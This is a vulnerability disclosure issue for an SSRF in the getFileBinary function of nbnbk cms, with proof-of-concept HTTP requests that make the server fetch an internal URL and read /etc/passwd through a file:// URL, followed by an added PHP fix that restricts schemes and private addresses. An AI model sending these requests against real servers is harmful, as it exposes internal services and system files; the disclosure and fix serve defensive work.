[Vuln] SSRF vulnerability in getFileBinary Function #5

Closed
@zer0yu

Description

A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

    /**
     * Convert a file to a Base64 binary stream
     * @param $url network file path, absolute URL
     * @return string
     */
    public function getFileBinary()
    {
        $str = file_get_contents($_REQUEST['url']);
        Util::echo_json(ReturnData::create(ReturnData::SUCCESS,chunk_split(base64_encode($str))));
    }

Vulnerability PoC

    GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
    Host: 172.16.119.130
    Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

image

A remote attacker can also read arbitrary file information from the target system.

PoC

    GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
    Host: 172.16.119.130
    Connection: close

png1

After base64-decoding the data field of the HTTP response body, you can get the content of the file (/etc/passwd).

image
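
One way to close both issues shown above (internal HTTP requests and `file://` reads), as an added example that is not part of the original report or the project's own fix. It assumes the PHP curl extension; `fetchRemoteFileSafely()`, the size cap and the timeouts are hypothetical choices.

```php
<?php
// Added example: SSRF-hardened replacement for file_get_contents($_REQUEST['url']).
// fetchRemoteFileSafely() is a hypothetical helper, not part of nbnbk cms.
function fetchRemoteFileSafely(string $url, int $maxBytes = 5242880): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Only http/https: rejects file://, php://, gopher:// and other wrappers.
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;
    }
    $host = trim($parts['host'], '[]');
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    // Resolve once; gethostbyname() returns the input unchanged on failure,
    // which then fails the IP validation below.
    $isLiteral = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $ip = $isLiteral ? $host : gethostbyname($host);
    // Reject loopback, link-local, RFC 1918 and other reserved ranges.
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
        return null;
    }

    $body = '';
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false, // a redirect could point back inside
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 10,
        // Abort the transfer once the response exceeds the size cap.
        CURLOPT_WRITEFUNCTION  => function ($ch, $chunk) use (&$body, $maxBytes) {
            $body .= $chunk;
            return strlen($body) > $maxBytes ? 0 : strlen($chunk);
        },
    ]);
    if (!$isLiteral) {
        // Pin the address that was validated, so a second DNS lookup
        // (DNS rebinding) cannot swap in an internal IP.
        curl_setopt($ch, CURLOPT_RESOLVE, ["$host:$port:$ip"]);
    }
    $ok = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    return ($ok && $status === 200) ? $body : null;
}
```

In `getFileBinary()`, the result of this helper would replace `$str`, with an error response returned when it is `null`. If the feature only ever needs a few known hosts, an explicit host allowlist in front of this check is stricter still.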
